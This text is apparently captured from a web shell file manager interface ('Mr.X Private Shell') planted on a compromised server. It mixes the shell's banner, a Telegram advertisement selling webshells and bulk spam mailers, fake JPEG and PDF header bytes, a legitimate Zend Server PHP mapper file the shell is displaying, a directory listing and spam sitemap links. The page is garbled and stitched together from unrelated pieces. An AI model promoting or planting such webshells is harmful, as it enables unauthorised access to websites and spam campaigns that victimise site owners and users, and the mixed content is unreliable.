xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace DevBar\Db;

use Zend\Db\Sql\Select,
    Configuration\MapperAbstract,
    ZendServer\Edition,
    Zend\Db\Sql\Predicate\Predicate,
    Configuration\MapperDirectives;
use ZendServer\Log\Log;

class FunctionsMapper extends MapperAbstract
{
    protected $setClass = '\DevBar\FunctionStatsContainer';

    /**
     * @param integer/array $requestId
     * @return \ZendServer\Set
     */
    public function getFunctions($requestId)
    {
        $table  = $this->getTableGateway()->getTable();
        $select = new Select($table);

        if (is_array($requestId)) {
            $retVal = array();

            if (!empty($requestId)) {
                $select->where(array('request_id' => $requestId));

                // group results by request id
                $result = $this->selectWith($select);
                if ($result)
                        foreach ($result as $row) {
                        if (!isset($retVal[$row->getRequestId()])) {
                            $retVal[$row->getRequestId()] = array();
                        }

                        $retVal[$row->getRequestId()][] = $row;
                    }
            }

            return $retVal;
        } else {
            $select->where(array('request_id' => $requestId));
            return $this->selectWith($select);
        }
    }

    public function removeDevBarRequests(array $ids)
    {
        $effected = $this->getTableGateway()->delete(array("request_id IN (".implode(",", $ids).")"));
        Log::debug("Deleted $effected rows from devbar_functions_stats");
    }
}

Filemanager

Name Type Size Permission Actions
AccessTokensMapper.php File 3.17 KB 0644
BacktraceMapper.php File 1.21 KB 0644
ExceptionsMapper.php File 887 B 0644
ExtensionsMapper.php File 1.53 KB 0644
ExtensionsMetadataMapper.php File 2.86 KB 0644
FunctionsMapper.php File 1.55 KB 0644
LogEntriesMapper.php File 1.21 KB 0644
MonitorEventsMapper.php File 972 B 0644
RequestsMapper.php File 13.4 KB 0644
RequestsUrlsMapper.php File 506 B 0644
RuntimeMapper.php File 1.21 KB 0644
SqlQueriesMapper.php File 1.56 KB 0644
SqlStatementsMapper.php File 601 B 0644
SuperglobalsMapper.php File 1.1 KB 0644
TokenMapper.php File 10.49 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml